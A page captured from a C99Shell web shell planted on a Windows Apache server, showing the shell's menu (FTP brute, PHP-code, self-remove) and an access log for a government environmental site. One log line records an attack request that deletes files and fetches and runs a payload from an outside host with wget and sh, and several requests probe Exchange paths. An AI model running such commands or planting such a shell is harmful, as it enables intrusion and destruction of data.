!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 8.02 GB of 239.26 GB (3.35%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2023.04.03.log (4.98 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
216.245.221.92 - - [03/Apr/2023:00:00:42 -0500] "HEAD / HTTP/1.1" 200 -
193.32.162.159 - - [03/Apr/2023:00:00:54 -0500] "GET / HTTP/1.1" 200 319
193.32.162.159 - - [03/Apr/2023:00:01:04 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
172.22.2.4 - - [03/Apr/2023:00:01:14 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/analisis%20C-595-2010.doc HTTP/1.1" 304 -
40.77.167.211 - - [03/Apr/2023:00:01:38 -0500] "GET /BLA/resoluciones/AUTOS%202022/0117.pdf HTTP/1.1" 304 -
131.161.210.82 - - [03/Apr/2023:00:01:52 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+161.35.208.230/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
40.77.167.80 - - [03/Apr/2023:00:01:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/6558.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2023:00:02:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
34.91.129.203 - - [03/Apr/2023:00:03:14 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [03/Apr/2023:00:01:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
34.90.4.87 - - [03/Apr/2023:00:03:48 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [03/Apr/2023:00:02:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [03/Apr/2023:00:05:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:00:06:59 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
152.61.192.232 - - [03/Apr/2023:00:09:01 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Apr/2023:00:07:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.35 - - [03/Apr/2023:00:09:29 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:00:08:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
167.114.1.197 - - [03/Apr/2023:00:10:35 -0500] "GET /auambari-deleito-con-sus-sonidos-ambientales-a-los-asistentes-de-fima-2021.html HTTP/1.1" 200 888
216.245.221.92 - - [03/Apr/2023:00:10:42 -0500] "HEAD / HTTP/1.1" 200 -
186.144.225.25 - - [03/Apr/2023:00:11:28 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
186.144.225.25 - - [03/Apr/2023:00:11:29 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
186.144.225.25 - - [03/Apr/2023:00:11:29 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
186.144.225.25 - - [03/Apr/2023:00:11:29 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
186.144.225.25 - - [03/Apr/2023:00:11:29 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/themes/orman/orman.css HTTP/1.1" 200 2152
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/nivo-slider.css HTTP/1.1" 200 1507
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/demo/style.css HTTP/1.1" 200 2222
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/demo/images/bannertortuga_optimized.jpg HTTP/1.1" 200 39066
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/demo/images/Bannermujeresquereverdecen.jpg HTTP/1.1" 200 46558
186.144.225.25 - - [03/Apr/2023:00:11:30 -0500] "GET /galeria/nivo-slider/demo/images/bannertrafico_optimized.jpg HTTP/1.1" 200 42578
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/Bannersedeelectronica.jpg HTTP/1.1" 200 40383
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/bannerrutaesperanza.jpg HTTP/1.1" 200 55560
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/banneraire2021.jpg HTTP/1.1" 200 265101
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/Bannerplasticosseptiembre.jpg HTTP/1.1" 200 45633
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/bannerresiduoshospitalariosagosto.jpg HTTP/1.1" 200 36499
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopularcrr68.jpg HTTP/1.1" 200 51887
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/banneraccionpopular.jpeg HTTP/1.1" 200 41707
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/bannerclases2021.jpg HTTP/1.1" 200 68230
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/bannercapacitacionesbogota.jpg HTTP/1.1" 200 42416
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/Bannerenvases.jpg HTTP/1.1" 200 37316
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/Bannervirtualescanales.jpg HTTP/1.1" 200 174544
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/themes/default/loading.gif HTTP/1.1" 200 1737
186.144.225.25 - - [03/Apr/2023:00:11:31 -0500] "GET /galeria/nivo-slider/demo/images/4Simple_Slider.png HTTP/1.1" 200 11722
186.144.225.25 - - [03/Apr/2023:00:11:32 -0500] "GET /galeria/nivo-slider/themes/default/arrows.png HTTP/1.1" 200 824
186.144.225.25 - - [03/Apr/2023:00:11:32 -0500] "GET /galeria/nivo-slider/themes/default/bullets.png HTTP/1.1" 200 1281
201.245.192.253 - - [03/Apr/2023:00:11:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
157.55.39.212 - - [03/Apr/2023:00:14:31 -0500] "GET /BLA/resoluciones/AUTOS%202010/2284.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Apr/2023:00:13:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.66 - - [03/Apr/2023:00:14:58 -0500] "-" 408 -
216.245.221.92 - - [03/Apr/2023:00:15:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:00:14:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
40.77.167.211 - - [03/Apr/2023:00:16:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2528.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2023:00:16:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
201.245.192.253 - - [03/Apr/2023:00:20:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43153
201.245.192.253 - - [03/Apr/2023:00:20:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43016
216.245.221.92 - - [03/Apr/2023:00:20:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:00:19:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:00:19:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57935
201.245.192.253 - - [03/Apr/2023:00:21:57 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
216.245.221.92 - - [03/Apr/2023:00:25:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:00:24:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:00:26:55 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:00:25:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [03/Apr/2023:00:30:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43153
201.245.192.253 - - [03/Apr/2023:00:30:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43016
216.245.221.92 - - [03/Apr/2023:00:30:42 -0500] "HEAD / HTTP/1.1" 200 -
191.102.199.223 - - [03/Apr/2023:00:30:58 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/jDtKlTMBV2ZZ627V0VKX8dBiQJdb/gaTXYwQzRAF58s60AUu33FlS&y=U2FsdGVkX19oCDavKt/KOCgxLe9mPatEYPKH/2dV07g= HTTP/1.1" 200 30
191.102.199.223 - - [03/Apr/2023:00:30:58 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/5VH/HfqRQt8v9hm01CxXknW2SKmQ8/B5rzlWpN40539ikV7mj6/Jcf6EcntzmU0tmZHK1gowQIvXbfTW0AOBzeUaZlKpRu3Y=&u=U2FsdGVkX19uVJ+iyDDKpZm/Kp9LmNZ2VP3W59j9pWA=&y=U2FsdGVkX19oCDavKt/KOCgxLe9mPatEYPKH/2dV07g= HTTP/1.1" 200 97
191.102.199.223 - - [03/Apr/2023:00:30:59 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/odjbZX7rq4NC4c/7PFKtZPX/xlEQTeY9deO7qRE8mWh1Kj5wcHo03bP2nJmffBbwQdeOeFPtFQal9q2RKVMGxqGh7rJlgjNmzbMuKjEbNJh9tK7oVbK86d/4bHpLNbv0w6Tu/NalLq4S2b0xCRfKcs+Y4Z2YOm4rB7vcZSRpEO6THi5SqDeK4w6aN5bpT8wD9n2kEOdfQU/fRk7x4KxDja6jnEbZSbMbJACbpHNFMd0ZEmLGLTsn+YAYt4nF78jojhIZRmwUiEIG+V+PUx2OQbG4zDzv4E4C49X625voawn1UvmNMqpW0624rBpenuxqKUJMdG/+3ZUrQPIt0bWzvhIcjcRalp2qJ74C7iSnv/j6HxKIZTnD7UbnrWiJHeR0DB9yJFUtkoGpsVEf47ybf16yVCn6qKoXrsF37mPhZXm8lNMniOPgRdigjqCxUHchWe5CBBp9HACorSmYe23ST++Tgx6RGx2N7zZSkLtoVrnoN5J3u4CunqDnTkXaLEwI23jlQf00KhpOnqT0RPxcVv83pSc4LRzQ+WQPWMrmSFBT1QkJ0cXlIeu9jxQmfTed730BQGqQvFQjpPCe1vRN4ijhGilfGEb7ETmMK/QPBwIovHxuPpZ2APYV3YlpcrsZX5Tvbq4M8F8/GOIBrLfcGF5d9CJdvIryIxtOSSPG/7QetiRW4odlkvPgDwOHFaJsGltTV4XWtJN+ECwK1qwTZZxa6QuyYYflb0qMTeYHvqVihTM015FuDrzIVdu4wkjRfKfJiQjbdVLlXuR9XGbDztesFLKT8vpksVDHRe3DL/XNbn4ad0oMJO27QzVcSl98bU2aAc0BjevMCs7+V68iFRn13kvFh7TaVRgn7mJudqV/e9LqrPEWGohwrYY0n9zsjEHuz5jFrIXVnLTJBECuxA1XJsuwm59op27XzSpeq9BFXs0Ch9EmOgw3d4Ki3oQM6YUu5bypYspdGWjEDLe/pSKtbF5ktQmaZSUliBRXYRkMhtKbl2fzlV3KXQKsm56LtF4sVlY5o3L8eSATAwzSqrICu+nEg8Fz+yWvfwxrqfwzjWm1Wy4LXhn+niclKiplXCbHRB2X8SMT6l8XwxgeRBmmMcp6kmkNmgxxSHoAZKZHj76lKT5aPpiz3aV+bRi53NXYW8XY83DauxpjeYImynsN48Smhhr8W9fTyOQhlxWKXQBUFNtDnNDbb5lME/mt7s5K5okzY/MGLHFQiQirWPwgsV4jZ1DJJvjaTE+i3pqWNv1UlI1fOg7Yw6dT9o99tdQbeKwWRgnqg2fStrNHITDuRkh9X9EN3OIeDNrgMzywOupVW0u/8xxFW8Hd1IAIZiv4I5/XcG9lyfkF1NsjelI1xNZQn9lUp1sErBA3Cw+O2mHIGq3FG66tNMPrk62EPMkebd9cJ2LmH0BzgjH3JertEUprr9Us=&u=U2FsdGVkX19uVJ+iyDDKpZm/Kp9LmNZ2VP3W59j9pWA=&y=U2FsdGVkX19oCDavKt/KOCgxLe9mPatEYPKH/2dV07g= HTTP/1.1" 200 4335
191.102.199.223 - - [03/Apr/2023:00:30:59 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18rRujihylPAgqPiW5ZJEj57z1/Wn2aGDKkdu5jhCykaD2KzvsiJbTqpRMTylrl7GZQCmaWtGAYFutpRdvxaJc4wCA/CtITxhobCQIP101q6WgEBV4L/4gkKwutunvBtLLAqYqMy6WFtJVE08xRKG1bU1khrfV2uZ1AdvZ505keMscjlb38EvYF/cE91ttcVLP6PzVKV4dnP/S8EzYumnqHdS8Cghz2QZD5xiqMQIHyVpIfCojpc26kcRkO+NX2EpHeTExyVOt2TpIODkL3bGRodbtSYbcCCkMXP/6FiOzGXwGLh14Mx0JyhKxtIUE0cFDukoRZAjQmmQ==&u=U2FsdGVkX19uVJ+iyDDKpZm/Kp9LmNZ2VP3W59j9pWA=&y=U2FsdGVkX19oCDavKt/KOCgxLe9mPatEYPKH/2dV07g= HTTP/1.1" 200 196
191.102.199.223 - - [03/Apr/2023:00:30:59 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/jDtKlTMBV2ZZ627V0VKX8dBiQJdb/gaTXYwQzRAF58s60AUu33FlS HTTP/1.1" 200 31032
152.61.128.50 - - [03/Apr/2023:00:31:02 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [03/Apr/2023:00:31:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:00:30:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:00:31:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
52.167.144.71 - - [03/Apr/2023:00:33:27 -0500] "GET /bla/resoluciones/autos%202015/1607.pdf HTTP/1.1" 200 486244
52.167.144.150 - - [03/Apr/2023:00:35:18 -0500] "GET /forest/ HTTP/1.1" 200 12041
216.245.221.92 - - [03/Apr/2023:00:35:42 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.167 - - [03/Apr/2023:00:36:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/4270.pdf HTTP/1.1" 304 -
201.245.192.253 - - [03/Apr/2023:00:36:53 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:00:36:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:00:37:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58297
66.249.73.63 - - [03/Apr/2023:00:39:16 -0500] "-" 408 -
201.245.192.253 - - [03/Apr/2023:00:40:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43153
201.245.192.253 - - [03/Apr/2023:00:40:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43016
216.245.221.92 - - [03/Apr/2023:00:40:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:00:41:52 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
31.13.127.4 - - [03/Apr/2023:00:42:00 -0500] "GET /images/convocatoria-panel-dsitrtal-para-el-cmabio-clim%C3%A1tico_optimized.jpeg HTTP/1.1" 404 1034
66.249.92.130 - - [03/Apr/2023:00:42:22 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [03/Apr/2023:00:43:58 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [03/Apr/2023:00:42:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.211 - - [03/Apr/2023:00:44:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/5471.pdf HTTP/1.1" 304 -
172.22.2.4 - - [03/Apr/2023:00:44:30 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
172.22.2.4 - - [03/Apr/2023:00:43:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
216.245.221.92 - - [03/Apr/2023:00:45:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:00:46:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:00:48:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
52.167.144.167 - - [03/Apr/2023:00:50:18 -0500] "GET /BLA/resoluciones/AUTOS%202022/2178.pdf HTTP/1.1" 304 -
216.245.221.92 - - [03/Apr/2023:00:50:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:00:49:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
152.61.192.232 - - [03/Apr/2023:00:51:13 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.192.232 - - [03/Apr/2023:00:51:14 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.192.232 - - [03/Apr/2023:00:51:15 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
66.249.66.11 - - [03/Apr/2023:00:51:25 -0500] "-" 408 -
201.245.192.253 - - [03/Apr/2023:00:51:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:00:51:57 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20ANALISIS%20SENTENCIA%20T-411%20DE%201992.doc HTTP/1.1" 200 41984
172.22.2.4 - - [03/Apr/2023:00:51:57 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
216.245.221.92 - - [03/Apr/2023:00:55:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:00:54:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.80 - - [03/Apr/2023:00:56:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5554.pdf HTTP/1.1" 200 474835
172.22.2.4 - - [03/Apr/2023:00:54:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [03/Apr/2023:00:56:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:00:58:23 -0500] "GET /BLA/boletinlegal/owa/auth/logon.aspx HTTP/1.1" 404 1018
66.249.66.10 - - [03/Apr/2023:00:59:58 -0500] "-" 408 -
216.245.221.92 - - [03/Apr/2023:01:00:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:01:13 -0500] "GET /BLA/boletinlegal/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application HTTP/1.1" 404 1018
172.22.2.4 - - [03/Apr/2023:00:59:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:01:01:49 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:01:00:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
131.107.160.108 - - [03/Apr/2023:01:02:33 -0500] "GET /bla/resoluciones/resoluciones%202015/1168.pdf HTTP/1.1" 200 560722
131.107.160.108 - - [03/Apr/2023:01:02:33 -0500] "GET /bla/resoluciones/resoluciones%202021/5394.pdf HTTP/1.1" 200 347503
131.107.160.108 - - [03/Apr/2023:01:02:33 -0500] "GET /bla/resoluciones/resoluciones%202021/5543.pdf HTTP/1.1" 200 368093
131.107.160.108 - - [03/Apr/2023:01:02:33 -0500] "GET /bla/resoluciones/resoluciones%202017/1159.pdf HTTP/1.1" 200 464279
131.107.160.108 - - [03/Apr/2023:01:02:33 -0500] "GET /bla/resoluciones/autos%202022/6059.pdf HTTP/1.1" 200 535793
131.107.160.108 - - [03/Apr/2023:01:02:33 -0500] "GET /bla/resoluciones/resoluciones%202021/0881.pdf HTTP/1.1" 200 967568
157.55.39.216 - - [03/Apr/2023:01:02:39 -0500] "GET /dia-mundial-del-agua-2023-programate-para-participar-en-estas-actividades-de-educacion-ambiental.html HTTP/1.1" 200 903
216.245.221.92 - - [03/Apr/2023:01:05:42 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.167 - - [03/Apr/2023:01:06:15 -0500] "GET /BLA/resoluciones/AUTOS%202015/7257.pdf HTTP/1.1" 200 437418
201.245.192.253 - - [03/Apr/2023:01:06:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:01:05:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:06:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
66.249.73.35 - - [03/Apr/2023:01:09:29 -0500] "-" 408 -
172.22.2.4 - - [03/Apr/2023:01:09:53 -0500] "GET /BLA/boletinlegal/owa/auth/x.js HTTP/1.1" 404 1018
52.167.144.150 - - [03/Apr/2023:01:10:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/3463.pdf HTTP/1.1" 304 -
216.245.221.92 - - [03/Apr/2023:01:10:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:01:11:51 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:01:11:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
138.201.157.89 - - [03/Apr/2023:01:14:04 -0500] "GET / HTTP/1.1" 200 319
138.201.157.89 - - [03/Apr/2023:01:14:04 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [03/Apr/2023:01:12:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
157.90.244.54 - - [03/Apr/2023:01:14:12 -0500] "GET / HTTP/1.1" 200 319
157.90.244.54 - - [03/Apr/2023:01:14:14 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [03/Apr/2023:01:15:39 -0500] "GET /BLA/boletinlegal/Circulares/2019/.pdf HTTP/1.1" 404 1038
173.252.107.9 - - [03/Apr/2023:01:15:40 -0500] "GET /las-mujeres-reverdecen-bogota-en-el-dia-mundial-de-los-humedales.html HTTP/1.1" 206 900
173.252.95.19 - - [03/Apr/2023:01:15:42 -0500] "GET /images/mujeres-reverdecen-humedales-2-febrero.jpg HTTP/1.1" 200 47327
216.245.221.92 - - [03/Apr/2023:01:15:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:01:16:50 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
52.167.144.43 - - [03/Apr/2023:01:17:31 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [03/Apr/2023:01:17:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.212 - - [03/Apr/2023:01:19:18 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12498
172.22.2.4 - - [03/Apr/2023:01:18:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [03/Apr/2023:01:20:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42992
201.245.192.253 - - [03/Apr/2023:01:20:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42681
216.245.221.92 - - [03/Apr/2023:01:20:42 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:01:21:44 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
152.61.128.50 - - [03/Apr/2023:01:22:52 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [03/Apr/2023:01:22:53 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [03/Apr/2023:01:22:53 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
34.141.209.26 - - [03/Apr/2023:01:23:12 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
130.211.54.158 - - [03/Apr/2023:01:23:17 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [03/Apr/2023:01:23:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [03/Apr/2023:01:25:42 -0500] "HEAD / HTTP/1.1" 200 -
34.91.129.203 - - [03/Apr/2023:01:25:46 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
172.22.2.4 - - [03/Apr/2023:01:24:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
201.245.192.253 - - [03/Apr/2023:01:26:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
34.147.120.241 - - [03/Apr/2023:01:26:55 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
201.245.192.253 - - [03/Apr/2023:01:30:28 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42992
201.245.192.253 - - [03/Apr/2023:01:30:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42681
216.245.221.92 - - [03/Apr/2023:01:30:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:29:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:29:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
201.245.192.253 - - [03/Apr/2023:01:31:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
172.22.2.4 - - [03/Apr/2023:01:32:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
157.55.39.212 - - [03/Apr/2023:01:33:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0236.pdf HTTP/1.1" 304 -
216.245.221.92 - - [03/Apr/2023:01:35:42 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [03/Apr/2023:01:34:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2023:01:36:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
172.22.2.4 - - [03/Apr/2023:01:35:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
201.245.192.253 - - [03/Apr/2023:01:37:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
201.245.192.253 - - [03/Apr/2023:01:38:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43001
66.249.73.39 - - [03/Apr/2023:01:39:29 -0500] "-" 408 -
